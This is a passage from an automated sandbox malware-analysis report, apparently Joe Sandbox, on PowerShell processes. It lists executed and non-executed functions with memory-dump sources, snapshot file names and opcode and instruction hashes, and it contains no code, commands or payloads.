                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2941556648.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd348b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4f44b90eead5d28c4d082f4905112f96caddb090595129571686060313a0ab87
                                                                                                • Instruction ID: 6eda948df2a132b8227f45afcf1f6eb7df1cea88c49c9465483cf2a136af3aa2
                                                                                                • Opcode Fuzzy Hash: 4f44b90eead5d28c4d082f4905112f96caddb090595129571686060313a0ab87
                                                                                                • Instruction Fuzzy Hash: 4A31F852F1FBDB0FF7E6976818B117C6AD0AF07258B9801BAD11DD72D3ED4CA8049282
                                                                                                Function 00007FFD347E3945 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                • Instruction ID: a3aa805882adb9c62ad537c971133e5f2f0b19ad6a47dc11fcc933690c630be0
                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                • Instruction Fuzzy Hash: 5601677121CB0C8FD744EF0CE451AA6B7E0FB95364F10056EE58AC3691D736E882CB45

                                                                                                Non-executed Functions

                                                                                                Function 00007FFD347E64A7 Relevance: .6, Instructions: 641COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8dfddbf1bb72bd97bebaaf45e47ba82bc2b77d1e36ff080f06731958659d73b8
                                                                                                • Instruction ID: 7266197e28117f7e3a20d2aa2487e57a7674f3edc48e389f90611503c9245ed5
                                                                                                • Opcode Fuzzy Hash: 8dfddbf1bb72bd97bebaaf45e47ba82bc2b77d1e36ff080f06731958659d73b8
                                                                                                • Instruction Fuzzy Hash: 01E1A596B0E7D29FE312576C68F60E63FA0EF5326434D41B7C284CA0A3E91D245BD395
                                                                                                Function 00007FFD347E3DF2 Relevance: .4, Instructions: 441COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 11ed363e2b9984e053d516fba785f088868676f4849063f672225f99af081887
                                                                                                • Instruction ID: e97196790d8d9ec79ab3647280a48b7772530afec7a9c4ab365e58b58d03648f
                                                                                                • Opcode Fuzzy Hash: 11ed363e2b9984e053d516fba785f088868676f4849063f672225f99af081887
                                                                                                • Instruction Fuzzy Hash: F4E1A271A08A498FDF94DF5CC4A5AEA77F1FF69300F184266D049D7256CA39A882CBC0
                                                                                                Function 00007FFD347E427B Relevance: .1, Instructions: 138COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ef3be8b240bb7232a9ac588915aafcef1768043dbe087b62fc098577c456bc4b
                                                                                                • Instruction ID: 7be6c96a8d48c5db2bf7b55d0cd5998e9b5dc977a8cde178765b37f4a7d3bfb4
                                                                                                • Opcode Fuzzy Hash: ef3be8b240bb7232a9ac588915aafcef1768043dbe087b62fc098577c456bc4b
                                                                                                • Instruction Fuzzy Hash: E3417297B0E7C29AE752463C9CB50E67FA0EE5326570D02F7C684CB093DA0D6847A7A1

                                                                                                Executed Functions

                                                                                                Function 04B5E928 Relevance: .3, Instructions: 281COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 08166ef661468a2de4657db18f4e1f24447260e0dfe8e2272d2645bfabd1f9d7
                                                                                                • Instruction ID: 4365fbfa2bf4403b8cee62f94bbb44083403a8b5a516c78a1608e91cdb8b801a
                                                                                                • Opcode Fuzzy Hash: 08166ef661468a2de4657db18f4e1f24447260e0dfe8e2272d2645bfabd1f9d7
                                                                                                • Instruction Fuzzy Hash: CEB14B71E002198FEB14CFA9C8857ADFBF2FF88305F148169E815A7264EB74E941CB91
                                                                                                Function 04B5F1F8 Relevance: .3, Instructions: 266COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 82647e1cfa74e82c02687f5ebf4cccf09209420ef4a3c1124efaae829fec7fd5
                                                                                                • Instruction ID: a2832f3de45a5268ec95b78b51bcb210a092c45cd5052c01dd24df3db5d70456
                                                                                                • Opcode Fuzzy Hash: 82647e1cfa74e82c02687f5ebf4cccf09209420ef4a3c1124efaae829fec7fd5
                                                                                                • Instruction Fuzzy Hash: BCB15171E002098FEF10CFA9D8957ADFBF2EF88714F148569E815E7264EB74A845CB81
                                                                                                Function 07A04DB8 Relevance: 1.0, Instructions: 1028COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1926ea9df924696d40d8dfc8ae8b4d3d9be6dfc7dbaada54d9d88cb648041d51
                                                                                                • Instruction ID: 74a7b0f530015c4ab7c6ee57594c4f0b9b5794984122b3b1d7475cfb58b8ced8
                                                                                                • Opcode Fuzzy Hash: 1926ea9df924696d40d8dfc8ae8b4d3d9be6dfc7dbaada54d9d88cb648041d51
                                                                                                • Instruction Fuzzy Hash: 3E827AB0E00205CFDB14CBA8C544A6ABBB2AFC9704F14C469D9159F795DB72EC86CF91
                                                                                                Function 07A0B24D Relevance: .7, Instructions: 704COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2b85a78e59f8b09ec2f2070a622f9c4894394b5978d8a6559aa045c86f146808
                                                                                                • Instruction ID: f834f0ca2bef064f51841e28bf752b8ef305114fa36465cc7469b4ce52954dea
                                                                                                • Opcode Fuzzy Hash: 2b85a78e59f8b09ec2f2070a622f9c4894394b5978d8a6559aa045c86f146808
                                                                                                • Instruction Fuzzy Hash: E8626EB4A00219DFDB14DB68C950BDDBBB2AF89304F1085D9D609AB385CB75EE81CF91
                                                                                                Function 07A05CA0 Relevance: .7, Instructions: 654COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e477de6bdb3b1676536153c8df53512575209e798bf01c3297de045b757403ce
                                                                                                • Instruction ID: 4dc7ba539c4e7f3f251b8fb0d31a9627106c633cf3c0d6bd0010f0b7ab8601a3
                                                                                                • Opcode Fuzzy Hash: e477de6bdb3b1676536153c8df53512575209e798bf01c3297de045b757403ce
                                                                                                • Instruction Fuzzy Hash: 50428FB4E00215DFDB24CF58D844B9ABBB2AFC9304F1085A9D519AB391CB71EC81CF92
                                                                                                Function 07A02808 Relevance: .6, Instructions: 580COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 181c67248628a29cc2e9f35b8376f15e53dca90062ab5af2c69eada459021af7
                                                                                                • Instruction ID: 96c6ea92332ef7c30be93adb4e64a2250f0157f4e7e3e34982c98f6e8479d53e
                                                                                                • Opcode Fuzzy Hash: 181c67248628a29cc2e9f35b8376f15e53dca90062ab5af2c69eada459021af7
                                                                                                • Instruction Fuzzy Hash: 4F122471604346DFDB258B68D858766BBB5BFC6310F2888AAD514CB2D6CB31C846C7E2
                                                                                                Function 07A05178 Relevance: .5, Instructions: 541COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cdb7879f3a07188cecb4462e27b347c77be0d64a3005e66bf10e31b13164827b
                                                                                                • Instruction ID: caa78930a3915b607dfb21af74d78806c24a296b6d99567bda31df5d0d1d0d46
                                                                                                • Opcode Fuzzy Hash: cdb7879f3a07188cecb4462e27b347c77be0d64a3005e66bf10e31b13164827b
                                                                                                • Instruction Fuzzy Hash: B43237B4E00205DFDB14CB98C544EA9BBB2AF89704F24C469E9199F395C772EC86CF91
                                                                                                Function 04B5B238 Relevance: .5, Instructions: 529COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 51b1755c61d380ef50f1b55ef3aaf5e5e6c21859ee5dacea096e0e1b76788e62
                                                                                                • Instruction ID: 3f41bced03d9dc1f21a6462d6d731624b253197a86a02a23cd7493696702ceaa
                                                                                                • Opcode Fuzzy Hash: 51b1755c61d380ef50f1b55ef3aaf5e5e6c21859ee5dacea096e0e1b76788e62
                                                                                                • Instruction Fuzzy Hash: 9E223E34B002188FDB25DB24D854BADB7B2BF89305F1584E9D90AAB361DF35AD85CF90
                                                                                                Function 07A0E178 Relevance: .5, Instructions: 521COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6bda41e388dcdbd283dc2112830fe2f463cec80354817dd20d036713a1582b19
                                                                                                • Instruction ID: ae794477ad7f4c3ecf0bdb6e4adec9330b2d9f19af973ccc50a8ef3742d3498d
                                                                                                • Opcode Fuzzy Hash: 6bda41e388dcdbd283dc2112830fe2f463cec80354817dd20d036713a1582b19
                                                                                                • Instruction Fuzzy Hash: D01207B1B04205CFDB14EB68D444AAABBF2AFC9710F14886AD515DB395CB32DC41DBE2
                                                                                                Function 07A058ED Relevance: .5, Instructions: 483COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ad0858b5f7f437257839b7c97766e0373b0ae1c0419bf69437bd5adc307e05d6
                                                                                                • Instruction ID: a2a06b3005c72647d457b2f1cb25af4acc9b818bd8d7c89796f34fb877ecbf03
                                                                                                • Opcode Fuzzy Hash: ad0858b5f7f437257839b7c97766e0373b0ae1c0419bf69437bd5adc307e05d6
                                                                                                • Instruction Fuzzy Hash: 891247B4E00205DFDB14CB88C544EAABBB2AF85704F24C869E9159F395D772EC86CF91
                                                                                                Function 07A04770 Relevance: .5, Instructions: 462COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8f30b3578b166ebc239b92d0e4dfc6f68cbae35d6dc8f19f1b82e281c4153f65
                                                                                                • Instruction ID: 9f834ab4c488c8c570c218419e7b84a84dcd14a9c2d99a173fd88a6b633c65d7
                                                                                                • Opcode Fuzzy Hash: 8f30b3578b166ebc239b92d0e4dfc6f68cbae35d6dc8f19f1b82e281c4153f65
                                                                                                • Instruction Fuzzy Hash: 5C02F2B0B00245DFD714CBA8D450BAEBBA2BFCA300F148869E611AB795CB71DC41CBE1
                                                                                                Function 07A0C681 Relevance: .4, Instructions: 397COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 390522d35925b3b35f2234b255c451f076faac3ac3c2438c938c81d3e917b07b
                                                                                                • Instruction ID: e0e9f0c679b3e43164c518d56a05fb5facded80f9a27243d466e0dc3ee95101d
                                                                                                • Opcode Fuzzy Hash: 390522d35925b3b35f2234b255c451f076faac3ac3c2438c938c81d3e917b07b
                                                                                                • Instruction Fuzzy Hash: 2E022CB4A00219DFDB24DB64C850BDDBBB2AF89304F1085E5DA09AB791CB75DE81CF91
                                                                                                Function 07A0631B Relevance: .4, Instructions: 387COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bc2d975b6c4d107e4cea050e7ec023081d83b2813b6aec73444ee49e7f801612
                                                                                                • Instruction ID: b7bc03c475e37d7d8d82b1e47c84290ba29ccf97cc03235893204d14a5cbba94
                                                                                                • Opcode Fuzzy Hash: bc2d975b6c4d107e4cea050e7ec023081d83b2813b6aec73444ee49e7f801612
                                                                                                • Instruction Fuzzy Hash: 0DF151B4A00215DFD724DB58C850BAABBB3AFC4704F10C499E609AF795CB71ED858B92
                                                                                                Function 07A0B970 Relevance: .4, Instructions: 363COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 13e56b53a16d1ba3c8b129850ced0c8c4e6c4e01ff52f51a89cbafaf63f3a0e9
                                                                                                • Instruction ID: 2bc6ee9dc1059c69fd09ffdf35402e8acaa9d7fdc9647523fe83e989c6397fdd
                                                                                                • Opcode Fuzzy Hash: 13e56b53a16d1ba3c8b129850ced0c8c4e6c4e01ff52f51a89cbafaf63f3a0e9
                                                                                                • Instruction Fuzzy Hash: FAE18EB0A00214DFD714DB68C954B9EBBB2AFC8704F1084D9E609AF391CB75ED818FA5
                                                                                                Function 07A06F40 Relevance: .3, Instructions: 339COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 03e0166ae1f6bcfec50d208cd79057d5693b3c8bec790f360cebd192d921bddb
                                                                                                • Instruction ID: c8d722a14d062b8ab6f9ed9793171c73a791115308626477e5104d6ad39ca72a
                                                                                                • Opcode Fuzzy Hash: 03e0166ae1f6bcfec50d208cd79057d5693b3c8bec790f360cebd192d921bddb
                                                                                                • Instruction Fuzzy Hash: E3D180B0A00205DFDB14CBA8D454B9EBBB2BFC8704F10C459E6156F795CB76E8458BE2
                                                                                                Function 07A00638 Relevance: .3, Instructions: 325COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bddbf01120e9f0fa4899854a2a9555ac931049db01ff52dd0a66228b70db0ca5
                                                                                                • Instruction ID: 30eeeefa4622aa4419a74a276df232368b15f44b62f29333e3268ad5964464f2
                                                                                                • Opcode Fuzzy Hash: bddbf01120e9f0fa4899854a2a9555ac931049db01ff52dd0a66228b70db0ca5
                                                                                                • Instruction Fuzzy Hash: 35B138B5B04206CFEB108B69E44477BBBB6EFC5351F14886AD524CB292DB75C841CBE2
                                                                                                Function 04B53670 Relevance: .3, Instructions: 314COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4c3cffc675245eea524fa9d59250953d6de32c5f582eedb4228fa508dc5a3878
                                                                                                • Instruction ID: 19c7b0f03b6bc5bc75089c5cce495da93788a2ba362d9bd04500fd8495c4f30a
                                                                                                • Opcode Fuzzy Hash: 4c3cffc675245eea524fa9d59250953d6de32c5f582eedb4228fa508dc5a3878
                                                                                                • Instruction Fuzzy Hash: A7D1F474A012499FDB05CFA8D494A9DFBF2FF89350F248199E805AB361C775ED82CB90
                                                                                                Function 04B5E924 Relevance: .3, Instructions: 275COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0a2bdb6f835fa4246493e18eaefa7249588fbea89539a2d229e00a6643167f7
                                                                                                • Instruction ID: f29a2dd6ea6b6658b57deefc78789200d242abc961dec088c1e0674440a1fe76
                                                                                                • Opcode Fuzzy Hash: a0a2bdb6f835fa4246493e18eaefa7249588fbea89539a2d229e00a6643167f7
                                                                                                • Instruction Fuzzy Hash: D8B14870E002198FEB10DFA8C88579DFBF2FF88705F148169E815AB264EB74E941CB91
                                                                                                Function 04B58D38 Relevance: .3, Instructions: 266COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dede4e8002b42c59cec5f5e9ea66dd61b53a9f7da988a6749a2c4b9688b144cb
                                                                                                • Instruction ID: 360aff0d33f9d0a7785617cb2396feef6d6f5f4d588cebc06354c18d13cf8a81
                                                                                                • Opcode Fuzzy Hash: dede4e8002b42c59cec5f5e9ea66dd61b53a9f7da988a6749a2c4b9688b144cb
                                                                                                • Instruction Fuzzy Hash: 16A18F75A00258DFDB14EFA4D944A9DFBB2FF89304F118598E806AF364DB74AD49CB80
                                                                                                Function 04B5F1EF Relevance: .3, Instructions: 263COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 84665a64258c3a6fee5b279093e4f7384ee0fddf9f63e64ecaa0ad79c6a3b58f
                                                                                                • Instruction ID: 2dbf49eee286316db82596f0e897bdd6a2a5e508953afb8f51f747bf00a6a3be
                                                                                                • Opcode Fuzzy Hash: 84665a64258c3a6fee5b279093e4f7384ee0fddf9f63e64ecaa0ad79c6a3b58f
                                                                                                • Instruction Fuzzy Hash: 7EB14D70E00249CFEF10CFA9D8857ADFBF1EF88714F148569E815AB264EB74A845CB81
                                                                                                Function 07A06F22 Relevance: .3, Instructions: 263COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 112c95494425de366474edaabd563ff325f1cd912850fa16ab287683522ac550
                                                                                                • Instruction ID: fa7887bd6686d203d0dd30d7e56678663d4ac3adf3c79db761746bf4554bc848
                                                                                                • Opcode Fuzzy Hash: 112c95494425de366474edaabd563ff325f1cd912850fa16ab287683522ac550
                                                                                                • Instruction Fuzzy Hash: 25B18CB0A00205DFDB14CFA8D440B9ABBB2BFC8704F10C559E6156F395CB72E8858BE2
                                                                                                Function 07A008C2 Relevance: .3, Instructions: 258COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a2c3d2ee5d8964e2f6ca87da06a3fe43b1b4687787aa716692e898eed4cc1109
                                                                                                • Instruction ID: 259dc79ffd1ece005502337bab2129e3e4612109682cacc6115f6ad15f440162
                                                                                                • Opcode Fuzzy Hash: a2c3d2ee5d8964e2f6ca87da06a3fe43b1b4687787aa716692e898eed4cc1109
                                                                                                • Instruction Fuzzy Hash: 3A8116B56043469FD7158B78A850767BFB5EFC6350F24886BE464CB292CB35C881C7E2
                                                                                                Function 04B58528 Relevance: .2, Instructions: 227COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf13e3136846d864e4dc556291cd14dbdfa94bb5590eda5390e4366a62a0e7fe
                                                                                                • Instruction ID: 39ef80d3032631d9fa6b2d44052b4f4098ae15a80c6e32265b19b1ae2e6dd2e8
                                                                                                • Opcode Fuzzy Hash: bf13e3136846d864e4dc556291cd14dbdfa94bb5590eda5390e4366a62a0e7fe
                                                                                                • Instruction Fuzzy Hash: 64918F34A052449FC715EFA9D444AAEFBF2FF89310F1485A9E8459B361CB35EC86CB90
                                                                                                Function 04B52B48 Relevance: .2, Instructions: 218COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: db4d9ac0e19eacbe333779ae23a524c53166af4bc59d5ab67d397dfdd21b834b
                                                                                                • Instruction ID: 407c0ad3c9fb89f3b321a993b27adbf02042b839d372bc32d53cc193649b9c82
                                                                                                • Opcode Fuzzy Hash: db4d9ac0e19eacbe333779ae23a524c53166af4bc59d5ab67d397dfdd21b834b
                                                                                                • Instruction Fuzzy Hash: 20916874A01645CFCB09CF59C494AAAFBB1FF89310B24869AD955AB3A5C335FC41CBA0
                                                                                                Function 07A0E4C4 Relevance: .2, Instructions: 207COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 60b5e96ad4d9fc1dd9812506b9778aa76a43740aa5d9a7baad286279c4f76cfd
                                                                                                • Instruction ID: a41c9eb0a5f90f300201fe585a5c586b60857da6f7bea59df91db6e64c599ddc
                                                                                                • Opcode Fuzzy Hash: 60b5e96ad4d9fc1dd9812506b9778aa76a43740aa5d9a7baad286279c4f76cfd
                                                                                                • Instruction Fuzzy Hash: 63818DB4A04205DFCB14DF58D484A99BBB2FF89314F14C8A9E914AB395C732EC81DFA1
                                                                                                Function 04B59488 Relevance: .2, Instructions: 189COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
